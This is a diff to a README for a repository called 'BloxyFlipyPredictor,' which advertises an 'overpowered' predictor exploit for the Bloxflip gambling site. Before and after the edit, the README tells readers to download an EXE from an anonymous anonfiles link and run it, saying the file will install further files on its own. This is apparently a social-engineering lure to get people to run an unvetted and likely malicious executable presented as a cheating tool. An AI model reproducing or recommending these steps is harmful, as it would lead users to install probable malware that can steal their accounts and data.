BlankoScript08/NoobBeamer/README.md

 # BloxyFlipyPredictor
-Bloxflip Predictor Exploit Overpowered to install this open go to https://anonfiles.com/Nei9IbPayf/BloxyFlipyPredictor_exe and download the  EXE Then it will install then open it then it will install  all required requirements
+# Steps:
+Bloxflip Predictor Exploit Overpowered
+* To install go to https://anonfiles.com/Nei9IbPayf/BloxyFlipyPredictor_exe
+* Then download the  EXE
+* Open BloxFlipyPredictor.exe
+* It will install all required files to open
+* Dpone, enjoy